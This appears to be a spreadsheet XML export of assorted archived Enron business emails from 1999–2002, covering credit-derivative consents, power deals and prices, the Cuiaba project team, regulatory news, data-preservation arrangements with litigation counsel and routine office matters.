_x000D_
Apparently there was some miscommunication.  It was very clear to me after _x000D_
our meeting in Louise's office that with respect to proposed Reference _x000D_
Entities with which Enron has an existing business relationship you were _x000D_
going to add the consent to the notice letter.  It was that consent that was _x000D_
to dramatically speed up the process of determining which Reference Entities _x000D_
could be listed.  As we discussed last week, without that consent each _x000D_
proposed Reference Entity must be evaluated separately regarding whether or _x000D_
not a confidentiality agreement is in place and whether or not the existing _x000D_
business relationship is extensive enough to require consent.  Neither of _x000D_
these evaluations will be easy or quick.  While Enron North America has been _x000D_
reasonably good about compiling lists of confidentiality agreements, it is by _x000D_
no means clear that all other Enron entities have done so.  We have not yet _x000D_
determined a process for evaluating the extent of the existing business _x000D_
relationships with our customers but that process will necessarily require _x000D_
significant amounts of legal and commercial time at a high enough level to _x000D_
make important judgment calls._x000D_
_x000D_
My impression was that you were willing to add the consents to the notice _x000D_
letters since in one fell swoop it resolved a difficult legal issue and moved _x000D_
your earliest possible launch date forward by weeks if not months but also on _x000D_
the assumption that if a customer was not willing to give us their consent we _x000D_
should not be taking the commercial risk that it was precisely those _x000D_
customers whose relationships would be jeopardized by proceeding to use them _x000D_
as a Reference Entity._x000D_
_x000D_
We will now move forward to develop the processes necessary to conduct the _x000D_
evaluations mentioned above.  Please send the list of proposed Reference _x000D_
Entities as soon as possible._x000D_
_x000D_
_x000D_
_x000D_
Bryan Seyfried_x000D_
01/19/2000 06:35 AM_x000D_
To: Mark Taylor/HOU/ECT@ECT, Louise Kitchen/LON/ECT@ECT_x000D_
cc: Paul Simons/LON/ECT@ECT _x000D_
Subject: Consent_x000D_
_x000D_
Just to clarify, we do not intend to ask for consent from every reference _x000D_
credit, we do intend to send introductory letters to the relevant parties at _x000D_
the initial set of reference credits which notifies them of our intentions _x000D_
and why it is good for them.  My hope is that there are very few reference _x000D_
credits that we need to get consent from and then we can make the commercial _x000D_
decision of whether it is better to get consent or not quote on them.  _x000D_
_x000D_
As an initial step, I think we need to understand which reference credits _x000D_
have confidentiality agreements in place and determine those names that we _x000D_
have a potential fiduciary responsibility.  The latter obviously will not be _x000D_
black and white but hopefully we can make some progress.  I would expect that _x000D_
are really deep relationships are likely to be with either really small _x000D_
counterparties or a very small subset of our large counterparties._x000D_
_x000D_
Hopefully I am restating what everyone already thought but if not apologies _x000D_
for the miscommunication._x000D_
_x000D_
Call me if you want to discuss further._x000D_
_x000D_
bs_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 00:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Deals-LADWPPX</t>
  </si>
  <si>
    <t>Hello, Rhonda Denton may have already asked you about these deals.  She is _x000D_
out today.  The following deals are in under LADWPPX.  We think they should _x000D_
be Los Angeles Dept of Water and Power._x000D_
_x000D_
475790_x000D_
476694_x000D_
476701_x000D_
476703_x000D_
476713_x000D_
479072_x000D_
479076_x000D_
479268_x000D_
479335_x000D_
_x000D_
_x000D_
Thanks!_x000D_
Melissa</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 13:55:02 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">IntercontinentalExchange _x000D_
Firm Power Price Bulletin _x000D_
_x000D_
For Power Delivered on Wednesday, November 07, 2001 _x000D_
(Trade Date of Tuesday, November 06, 2001) _x000D_
_x000D_
Click here to access index history &lt;http://www.intcx.com/SubscriberServlet/subscriberservlet.class?operation=powerIndexForm&amp;hub=All&gt;. _x000D_
_x000D_
* volume represents sell-side only * _x000D_
_x000D_
Hub	 High	 Low	 Wtd Avg Index	 Change ($)	 Vol (Mwh)	 _x000D_
Cinergy	$23.75	$22.50	$22.97	- .43	56,800	_x000D_
Comed	$23.00	$21.75	$22.20	+ 1.12	8,800	_x000D_
Entergy	$27.00	$24.50	$24.94	- .47	19,200	_x000D_
Nepool	$36.00	$34.25	$35.22	- .55	5,600	_x000D_
Palo Verde	$32.50	$31.25	$32.00	+ .44	4,800	_x000D_
PJM-West	$24.50	$24.30	$24.38	- .26	164,000	_x000D_
SP-15	$34.00	$30.75	$33.17	+ .93	6,400	_x000D_
TVA	$23.75	$23.00	$23.59	- .14	22,400	_x000D_
_x000D_
Includes all trades done from 6 AM to 11 AM Central Prevailing Time on the trade date specified for financially firm power delivered during the on-peak hours (6 AM - 10 PM CPT for Eastern hubs / 6 AM - 10 PM Pacific Prevailing Time for Western hubs) on the delivery date(s) specified. _x000D_
_x000D_
IntercontinentalExchange is the world's most liquid trading platform for over-the-counter energy and metals.  Active markets include North American power and natural gas, global crude and refined oil products, and precious metals.  Traded instruments include forwards, swaps, and options. _x000D_
_x000D_
In order to receive the proprietary information contained in this email, you acknowledge and agree that you shall not further disseminate the IntercontinentalExchange Market Data contained herein to any person or entity without the express written consent of IntercontinentalExchange.   Furthermore, you acknowledge that (1) IntercontinentalExchange has exclusive and valuable property rights in this data; (2) IntercontinentalExchange's data is being made available to you only for your own business or personal activities; and (3) you cannot communicate the data, in any form, to any other person or entity without the express written consent of IntercontinentalExchange. _x000D_
_x000D_
This data is provided to you free of charge.  IntercontinentalExchange reserves the right to cancel this service at any time for any reason or no reason at all. _x000D_
_x000D_
You agree that IntercontinentalExchange does not make any representations or warranties, express or implied, with respect to the data. _x000D_
_x000D_
To become an Exchange Participant or inquire about the indices, please contact sales@intcx.com &lt;mailto:sales@intcx.com&gt;. _x000D_
_x000D_
To unsubscribe from this service, click here unsubscribe &lt;http://www.intcx.com/subscribe.html&gt;. _x000D_
_x000D_
_x000D_
?Copyright IntercontinentalExchange, Inc. 2001, All Rights Reserved. </t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 07:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cuiaba I Team</t>
  </si>
  <si>
    <t xml:space="preserve">Rebecca, if you wouldn't mind I would like to sit in on the Monday meeting.  _x000D_
I think that Mariella from what I have seen and heard is very capable.  I _x000D_
strongly believe that we need to put a dedicated (with fresh eyes) SWAT team _x000D_
on this one that has control of the complete commercial, technical and _x000D_
financial aspects of this project.  This is the only way to be effective. _x000D_
Whether it is with you or me or both, I am indifferent_x000D_
_x000D_
I would like to ensure that Kishkill, Wiggs, Gonzales and Alberquerque are _x000D_
not buried in this project given other goals and objectives._x000D_
_x000D_
Thanks_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
_x000D_
_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/30/2000 _x000D_
03:03 PM ---------------------------_x000D_
_x000D_
_x000D_
Rebecca McDonald@ENRON_DEVELOPMENT_x000D_
11/29/2000 07:52 AM_x000D_
To: David W Delainey@ECT_x000D_
cc:  _x000D_
Subject: Cuiaba I Team_x000D_
_x000D_
Dave,_x000D_
_x000D_
I am sorry that I was unable to meet with you yesterday on Cuiba.  Jim has _x000D_
told me what the two of you decided and it is fine with me.  Below is a note _x000D_
that I received this morning from Pete.  The meeting he is referencing is an _x000D_
indepth update on the project that I requested a week ago.  You are more than _x000D_
welcome to attend if you would like to - just let me know._x000D_
_x000D_
I am not sure that Pete is the right guy to work this or not, but I do agree _x000D_
that we need to introduce someone else into the process - I am thinking _x000D_
either Chris Hunt or Mariella Mahan.  I would be happy to discuss with you _x000D_
why I recommend one of those two individuals._x000D_
_x000D_
Rebecca_x000D_
---------------------- Forwarded by Rebecca McDonald/ENRON_DEVELOPMENT on _x000D_
11/29/2000 07:57 AM ---------------------------_x000D_
_x000D_
_x000D_
Peter E Weidler@ENRON_x000D_
11/29/2000 06:56 AM_x000D_
To: Rebecca McDonald/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Cuiaba I Team_x000D_
_x000D_
the list below is going to Delainey - it is accurate from my perspective - if _x000D_
the project ends up in your shop for completion and fixing up - and if it _x000D_
ends up under me - some of these part time guys should become full time and _x000D_
some of the full time guys should take a back seat._x000D_
_x000D_
I would have the full time dedicated team be - _x000D_
_x000D_
Jose Bestard (he currently is chief of regulatory for South America) - he _x000D_
negotiated the original PPA and has indepth knowledge of how the regulatory _x000D_
system does and does not work._x000D_
_x000D_
Joao Carlos Alberquerque - top notch Brazilian power expert - has the right _x000D_
contacts and relationships and can get us through the maze of Brazilian _x000D_
resistance.  Currently he is headed for wholesale merchant._x000D_
_x000D_
John Novak - best legal mind - needs to curb the use of outside lawyers a bit _x000D_
- has been on the project continuous from day one - and needs to be _x000D_
rejuvenated a bit - but has thourough understanding of how bthe entire _x000D_
project is wired together._x000D_
_x000D_
Rob Gay - Finance _x000D_
_x000D_
Laine Powell - is currently President of the oeprating companies - Cuiaba is _x000D_
producing 300 mw of power which is being sold and paid for._x000D_
_x000D_
Felipe Ospina - modeler - I don't know this guy -  he is relatively new to _x000D_
the project and seems satisfactory_x000D_
_x000D_
Would recommend also a fresh set of eyes on the project - not front line _x000D_
negotiator - but someone good at structuring - or work outs - to review _x000D_
overall project structure objectively and challange conventional wisdom. _x000D_
_x000D_
Other folks on the list below can support the dedicated team - part time._x000D_
_x000D_
Would tell these guys - this is your only job - and here is your starting _x000D_
point - new deal.  Your job is not just to close financing - it is to get _x000D_
Enron's money out or otherwise improve the returns of the project.    You _x000D_
will get paid based on this point forward.   It will take at least 9 months _x000D_
to implement a solution that improves our returns or gest more than just _x000D_
financial close achieved._x000D_
_x000D_
This leaves some sticky situations - Rick Lammers has absolutely busted his _x000D_
ass getting things done and moving the project forward - he has been lead _x000D_
developer - but has had lots of "help" from Bannantine and the entire team.   _x000D_
Help tended to obscure responsibility and accountability.  I am not sure _x000D_
anyone could have gotten this thing done by now - but certainly there were _x000D_
some things that could have been done better - in 20/20 hindsight  - and some _x000D_
things that can be done better now.  The things that come be done better now _x000D_
- I am pushing into Laines's area of responsibility this week.  People need _x000D_
to get rededicated and fired back up - I also think it is kind of difficult _x000D_
to "take over" the project without making some changes in the way it is being _x000D_
run.   _x000D_
_x000D_
For the review on Monday - I have asked the following people to present -_x000D_
_x000D_
Rick Lammers_x000D_
Laine Powell_x000D_
Jose Bestard_x000D_
_x000D_
Also in attendance will be John Novak, Joe Kishkill, Brett Wiggs, Rob Gay and _x000D_
myself._x000D_
_x000D_
The guys asked if Jim Bannantine should be present - I said no - let me know _x000D_
if you would like him there._x000D_
_x000D_
You should see - a brief description of the overall project (not the strategy _x000D_
- just how it is wired together- where the money is intended to be be) and _x000D_
then straight to a listing of all things that need to get done to "finish" _x000D_
the project to the point where we have financial close and a functioning _x000D_
supply and PPA._x000D_
_x000D_
Joe and I and Rob will be in Houston and the rest of the team will dial in a _x000D_
conference call. _x000D_
_x000D_
Let me know if the above format is ok._x000D_
_x000D_
Pete_x000D_
    _x000D_
---------------------- Forwarded by Peter E Weidler/NA/Enron on 11/29/2000 _x000D_
06:29 AM ---------------------------_x000D_
_x000D_
_x000D_
Miguel Padron_x000D_
11/29/2000 04:17 AM_x000D_
To: James M Bannantine/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joe _x000D_
Kishkill/SA/Enron@Enron, Peter E Weidler/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Cuiaba I Team_x000D_
_x000D_
To all, Here is the Cuiaba I Team....Miguel_x000D_
_x000D_
---------------------- Forwarded by Brett R Wiggs/SA/Enron on 11/28/2000 _x000D_
10:40 AM ---------------------------_x000D_
_x000D_
_x000D_
Richard A Lammers_x000D_
11/27/2000 04:35 PM_x000D_
Sent by: Richard A Lammers_x000D_
To: Miguel Padron/SA/Enron@Enron, Brett R Wiggs/SA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Re: Cuiaba I Team  _x000D_
_x000D_
Cuiaba 1 team currently consists of:_x000D_
_x000D_
Rick Lammers -lead developer_x000D_
john novak- legal _x000D_
Rob G Gay- Finance part time_x000D_
Traci Bersoni- support Finance part time_x000D_
Stephen Gray- support Finance part time_x000D_
Felipe Ospina- project analyst_x000D_
Gabriela Aguilar  -support -gas part time_x000D_
Emmanuel Rengade- Sudam financing and Equity Sale_x000D_
Marcus Stephen-Sudam financing and Equity Sale_x000D_
 _x000D_
Joao Carlos Alberquerque- support PPA_x000D_
Jose Bestard- support PPA and regulatory_x000D_
_x000D_
Asset management_x000D_
_x000D_
Laine A Powell-construction management and operations_x000D_
Christiaan Huizer-Project analyst_x000D_
_x000D_
Let me know if I can help furtherh_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Dec 1999 09:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ridggway@aol.com'})</t>
  </si>
  <si>
    <t>Re: Enron Ranked Number 24 on Fortune's 100 Best Companie</t>
  </si>
  <si>
    <t>I tried ridggway@concentric.net and it didn't work.  Is there some type _x000D_
there?</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sslater@epsa.org'})</t>
  </si>
  <si>
    <t>frozenset({'mona.l.petrochko@enron.com', 'elizabeth.linnell@enron.com', 'rboston@enron.com', 'mary.hain@enron.com', 'harry.kingerski@enron.com', 'snord@enron.com', 'rshapiro@enron.com', 'marchris.robinson@enron.com', 'paul.kaufman@enron.com', 'tom.chapman@enron.com', 'jmigden@enron.com', 'jsteffes@enron.com', 'bhueter@enron.com'})</t>
  </si>
  <si>
    <t>FERC Nominees Announced Today</t>
  </si>
  <si>
    <t xml:space="preserve">MEMORANDUM_x000D_
_x000D_
TO: Legislative Affairs Committee_x000D_
                Regulatory Affairs Committee_x000D_
                Power Marketers Working Group_x000D_
_x000D_
FROM: Scott A. Weiner, Legislative Affairs Committee Chair_x000D_
                Joe Hartsoe, Regulatory Affairs Committee Chair_x000D_
                Bob Reilley, Power Marketers Working Group Chair_x000D_
                Eugene F. Peters, Vice President of Legislative Affairs_x000D_
                Julie Simon, Vice President of Policy_x000D_
_x000D_
DATE: March 27, 2001_x000D_
_x000D_
RE: FERC Nominees Announced Today_x000D_
_x000D_
The White House announced today, Pat Wood, Chairman of the Texas Public _x000D_
Utility Commission, and Nora Mead Brownell, Commissioner of the Pennsylvania _x000D_
Public Utility Commission as FERC nominees.  Their names were sent to _x000D_
Congress for confirmation to FERC._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 00:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EOL approvals, 2-20-01</t>
  </si>
  <si>
    <t xml:space="preserve">The only change for Con Ed was with respect to FINANCIAL power. Thus, the _x000D_
physical power profiles for them remain unchanged._x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	02/21/2001 07:11 AM_x000D_
		_x000D_
		 To: Shari Stack/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: EOL approvals, 2-20-01_x000D_
_x000D_
For Consolidated Edison Energy, Inc., coming thru by Credit to open them for _x000D_
US east power, you already had them open to trade all power under the GTC, so _x000D_
I am going to keep them at that._x000D_
_x000D_
_x000D_
_x000D_
	Shari Stack_x000D_
	02/20/2001 08:56 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Rhonda L Denton/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT_x000D_
		 Subject: Re: EOL approvals, 2-20-01_x000D_
_x000D_
Tana,_x000D_
_x000D_
Declined for US Physical Power_x000D_
_x000D_
U.S. Minerals Management Service- Not FERC approved/Not current CP_x000D_
_x000D_
_x000D_
Approved for US Physical Power_x000D_
_x000D_
Split Rock- Ok to open them up to buys and sales_x000D_
_x000D_
_x000D_
Ditto Credit_x000D_
NGL Supply, Inc._x000D_
NGL Supply, Inc. dba Premier Energy Partners_x000D_
_x000D_
Thanks, _x000D_
_x000D_
Shari_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'stacy.dickson@enron.com', 'harry.collins@enron.com', 'david.portz@enron.com', 'david.minns@enron.com', 'alan.aronowitz@enron.com', 'rhonda.denton@enron.com', 'elizabeth.sager@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.hodge@enron.com', 'robbi.rossi@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>EOL Credit Responses 07/13/00</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 07/13/2000 04:26 PM -----_x000D_
_x000D_
	Tom Moran_x000D_
	07/13/2000 04:18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Molly Harris/HOU/ECT@ECT, Cynthia Clark/Corp/Enron@ENRON, Mary G _x000D_
Gosnell/HOU/ECT@ECT, Enron Europe Global Contracts and Facilities, Enron _x000D_
Europe Global CounterParty, Stephanie Sever/HOU/ECT@ECT, Bradley _x000D_
Diebner/HOU/ECT@ECT, Stacey Richardson/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL Credit Responses 07/13/00_x000D_
_x000D_
_x000D_
Please find attached Credit's EOL responses for 7/13/00._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
tm  </t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 03:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mlk@pkns.com'})</t>
  </si>
  <si>
    <t>FW: Summary Outline of our ongoing preservation discussions</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Richard B Sanders/HOU/ECT on 06/11/2001 10:50 AM -----_x000D_
_x000D_
	"Fergus, Gary S." &lt;GFergus@brobeck.com&gt;_x000D_
	05/23/2001 07:04 PM_x000D_
		 _x000D_
		 To: "Richard B. Sanders Esq. (E-mail)" &lt;richard.b.sanders@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: Summary Outline of our ongoing preservation discussions_x000D_
_x000D_
_x000D_
FYI_x000D_
Thanks_x000D_
Gary_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Fergus, Gary S._x000D_
&gt; Sent: Tuesday, May 08, 2001 1:37 PM_x000D_
&gt; To: Andy Pickens (E-mail); Barrett H. Reasoner (E-mail); David J. Noonan_x000D_
&gt; (E-mail); Jean Frizzell (E-mail); Michael L. Kirby (E-mail); Michael_x000D_
&gt; Molland; Mike D. Smith (E-mail); Peter Meringolo; Richard B. Sanders Esq._x000D_
&gt; (E-mail); Robert C. Williams (E-mail); Susan Bisop (E-mail)_x000D_
&gt; Subject: FW: Summary Outline of our ongoing preservation discussions_x000D_
&gt; Importance: High_x000D_
&gt;_x000D_
&gt; FYI_x000D_
&gt; Thanks_x000D_
&gt; Gary_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Fergus, Gary S._x000D_
&gt; Sent: Wednesday, December 20, 2000 2:41 PM_x000D_
&gt; To: 'Richard Rochman (E-mail)'_x000D_
&gt; Subject: Summary Outline of our ongoing preservation discussions_x000D_
&gt; Importance: High_x000D_
&gt;_x000D_
&gt; Rich,_x000D_
&gt;  As promised, here is my summary outline of what we discussed_x000D_
&gt; regarding preservation of data:_x000D_
&gt;_x000D_
&gt; 1. In Portland, we proposed to handle business email related to the_x000D_
&gt; topics in your preservation letter by instructing employees not to delete_x000D_
&gt; any email sent or received for 24 hours.  Email that is personal and does_x000D_
&gt; not relate to the business topics you have identified can be kept,_x000D_
&gt; discarded etc. at the employee's pleasure.  Each day there is a backup_x000D_
&gt; made that will capture the email in those employees mailboxes.  After 24_x000D_
&gt; hours, each employee is free to manage their email box as they deem_x000D_
&gt; appropriate to the business needs (e.g. keep, discard).  From our_x000D_
&gt; conversation, I understand that you agree that this is an acceptable_x000D_
&gt; procedure._x000D_
&gt;_x000D_
&gt; 2. With respect to the hard drives on individual computers, you would_x000D_
&gt; like to get an organizational chart for Portland that would enable us to_x000D_
&gt; discuss 6-12 individual's computers that would be copied using ProQuest_x000D_
&gt; Drive Image Pro 4.0.  In addition, there may be some other individuals_x000D_
&gt; that you would like to have us use a software product called Robocopy to_x000D_
&gt; copy files from their hard drives onto the network.  Until we figure out_x000D_
&gt; which computers to copy etc. we will not begin this process.  We discussed_x000D_
&gt; that because of the holiday period, it may not be practical to get this_x000D_
&gt; started until after the new year._x000D_
&gt;_x000D_
&gt; 3. Outside of Portland, we have proposed making a snapshot backup along_x000D_
&gt; business function lines reasonably called for by the subject matter of_x000D_
&gt; your request.  We propose not to backup any other business units or_x000D_
&gt; functions.  On a going forward basis, those business functions that_x000D_
&gt; related to the subject matter of your request would be instructed not to_x000D_
&gt; delete business email._x000D_
&gt;_x000D_
&gt; 4. We believe that relevant database  backups have been and will_x000D_
&gt; continue to be made and preserved._x000D_
&gt;_x000D_
&gt; 5. When an employee runs out of hard disk space on their computer, it_x000D_
&gt; is an acceptable practice to copy files form their hard disk to the_x000D_
&gt; network (where they will be backed up) and then delete those copied files_x000D_
&gt; to make sufficient work space for the employee to work._x000D_
&gt;_x000D_
&gt; 6. For EES, I explained that their IT services are outsourced so we do_x000D_
&gt; not have as detailed information immediately available._x000D_
&gt;_x000D_
&gt; As I mentioned on the phone, all of these discussions and efforts being_x000D_
&gt; made are done without waiving any objections that any of the Enron_x000D_
&gt; entities may have to your request including scope, burden, jurisdiction,_x000D_
&gt; relevance, privilege, privacy, vagueness etc. and Enron specifically_x000D_
&gt; reserves each and every right and objection it or its employees may have._x000D_
&gt;_x000D_
&gt; Please let me know if your general understanding of our conversation is_x000D_
&gt; different than the above._x000D_
&gt;_x000D_
&gt; Thanks_x000D_
&gt; Gary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Tue, 29 Jan 2002 21:23:50 -0800 (PST)</t>
  </si>
  <si>
    <t>PROJECT FINANCE WEEK   March 11-15, NY NY</t>
  </si>
  <si>
    <t>Project Finance Week_x000D_
_x000D_
March 11-15, 2002 ? Metropolitan Hotel, New York City_x000D_
                                                              _x000D_
 Click Here To Download A Complete Conference Brochure:_x000D_
_x000D_
http://www.pmaconference.com/pfwbro_pma.pdf_x000D_
_x000D_
Infocast's Project Finance Week continues to be rated the best introductory course on project finance available to developers, financiers, attorneys, utility representatives and vendors. _x000D_
_x000D_
Course #1, Project Finance The Tutorial, has been revamped for the new realities of 2002, offering in-depth sessions on today's hottest financing trends, including portfolio financing, synthetic leasing, and risk management strategies for merchant financing. These in-depth sessions will be enhanced by hearing the lessons learned by active participants in many of the top project financings of 2001._x000D_
_x000D_
? The Contractor's Perspective On Construction,Completion And Performance Risk_x000D_
? The Role Of Credit Ratings In Project Financed Transactions_x000D_
? Structuring The Project As A Synthetic Lease_x000D_
? Structuring Your Project And Getting Financing In The Post Enron Collapse Environment_x000D_
? Real-World Acquisitions And Divestitures Of Distressed Projects_x000D_
? Moving From Commercial Agreements To Financeable Contract_x000D_
? Translating And Negotiating The "Underwriting" Term Sheet_x000D_
? Completion Issues_x000D_
? Fuel &amp; Tariffs_x000D_
? The Loan Agreement - Locating And Defusing The Land Mines_x000D_
? The Security Agreements_x000D_
? Consents &amp; Opinions_x000D_
? Review Of Additional Issues Common To International Projects_x000D_
_x000D_
WORKSHOP #1: 8:00 AM - 12:00 PM_x000D_
_x000D_
Negotiating and Documenting the Key Project Agreements_x000D_
_x000D_
_x000D_
WORKSHOP #2: 1:30 PM - 5:00 PM_x000D_
_x000D_
Predicting the Price of Power for Asset Valuation in Merchant Power Financings_x000D_
_x000D_
_x000D_
Click Here To Download A Complete Conference Brochure:_x000D_
_x000D_
http://www.pmaconference.com/pfwbro_pma.pdf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Visit our Subscription Center to edit your interests or unsubscribe._x000D_
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=michelle.lokay@enron.com_x000D_
 _x000D_
View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 00:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CommodityLogic Big Numbers</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff, _x000D_
_x000D_
FYI, I just got this from Tom.  We don't have a very big opportunity here!  _x000D_
Tom did tell me that his numbers were going to be difficult to get.  Not that _x000D_
i don't want to put $5 trillion on our chart, but what do you think we should _x000D_
put as market size?  Nat gas, power and our existing verticals only?  What do _x000D_
you think?_x000D_
_x000D_
He is the only one to give me a number yet.  I am going to discuss it at the _x000D_
staff meeting._x000D_
_x000D_
Mike_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 07/13/2000 _x000D_
07:47 AM ---------------------------_x000D_
_x000D_
_x000D_
Thomas D Gros@ENRON_x000D_
07/12/2000 04:33 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CommodityLogic Big Numbers_x000D_
_x000D_
Mike,_x000D_
_x000D_
Please find attached my initial attempt at 100,000-foot-level numbers for _x000D_
CommodityLogic.  I am happy to discuss further at your convenience._x000D_
_x000D_
All the best,_x000D_
_x000D_
Tom_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 15 Apr 2001 12:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Cheney Meeting Briefing Book</t>
  </si>
  <si>
    <t xml:space="preserve">You are awesome._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Linda Robertson_x000D_
04/13/2001 03:58 PM_x000D_
Sent by: Lora Sullivan_x000D_
To: Rosalee Fleming/Corp/Enron@ENRON, Tori L Wells/HOU/ECT@ECT, Steven J _x000D_
Kean/NA/Enron@Enron, Linda Robertson/NA/Enron@ENRON, Richard _x000D_
Shapiro/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Carolyn Cooney/Corp/Enron@ENRON, Lora _x000D_
Sullivan/Corp/Enron@ENRON, Tom Briggs/NA/Enron@Enron, Carin _x000D_
Nersesian/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Cheney Meeting Briefing Book_x000D_
_x000D_
Attached is the Briefing Book for the 10:00 AM (EDT) Cheney meeting on _x000D_
Tuesday, April 17, 2001._x000D_
_x000D_
We will be making additions to this book over the weekend, and a final _x000D_
document will be ready for Ken Lay and Steve Kean on Monday evening._x000D_
_x000D_
By fax we are sending the attachment documents which were not available to us _x000D_
electronically._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 02:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Long term service</t>
  </si>
  <si>
    <t xml:space="preserve">Dawn, right now I am scheduled to be up in Calgary on the 16th of August - _x000D_
lets shoot for that date._x000D_
_x000D_
Regards _x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 07/28/2000 _x000D_
08:42 AM ---------------------------_x000D_
_x000D_
_x000D_
Dawn Doucet_x000D_
07/26/2000 05:36 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: Patricia Henry/CAL/ECT@ECT _x000D_
Subject: Long term service_x000D_
_x000D_
Hi Dave,_x000D_
Milly's 5 year anniversary is August 1st.  Any trips to Canada planned around _x000D_
then?  How do you want to deliver his service award?  He selected the _x000D_
pen/pencil set.  Let me know how you want to handle it......_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'duong.luu@enron.com'})</t>
  </si>
  <si>
    <t>Re: enpower login</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Christopher,_x000D_
_x000D_
Please use pwrtestn instead production_x000D_
_x000D_
Thanks,_x000D_
dluu_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Christopher Watts@ENRON_x000D_
	12/12/2000 04:13 PM_x000D_
		 _x000D_
		 To: Duong Luu/HOU/ECT@ECT_x000D_
		 cc: Christopher Watts/NA/Enron@Enron, Benjamin Rogers/HOU/ECT@ECT, Alton _x000D_
Jackson/Corp/Enron@Enron_x000D_
		 Subject: enpower login_x000D_
_x000D_
I used the following login information we set up during our presentation, _x000D_
however, I got the following error message:_x000D_
_x000D_
user name:  cwatts_x000D_
password:  cwatts_x000D_
_x000D_
Unknown user name or password.  ORA 01017 invalid username/password; logon _x000D_
denied Alias Power._x000D_
_x000D_
Thanks immensely for the EnPower presentation and all the helpful _x000D_
information.  We will be in touch._x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 07:41:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'s..shively@enron.com', 'scott.neal@enron.com'})</t>
  </si>
  <si>
    <t>US Gas Online Trading Access Update</t>
  </si>
  <si>
    <t>_x000D_
 Please review the attached spreadsheet for Stack Manager and Website Access for the UBS Online Trading Platform and note any necessary changes._x000D_
_x000D_
 _x000D_
_x000D_
Thank you for your help._x000D_
_x000D_
Stephanie Sever_x000D_
EnronOnline_x000D_
713-853-3465</t>
  </si>
  <si>
    <t>Mon, 11 Mar 2002 01:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rabi.sahoo@enron.com'})</t>
  </si>
  <si>
    <t>Re: February Mon Files</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
MON data is moved to Production._x000D_
_x000D_
Thanks_x000D_
_x000D_
Rabi_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Fisher_x000D_
03/08/2002 02:54 PM_x000D_
To: Sunitha Kongara/EWC/Enron@Enron_x000D_
cc: Patricia Hunter/EWC/Enron@ENRON, Rabi Sahoo/EWC/Enron@ENRON, Mark V _x000D_
Walker/EWC/Enron@ENRON _x000D_
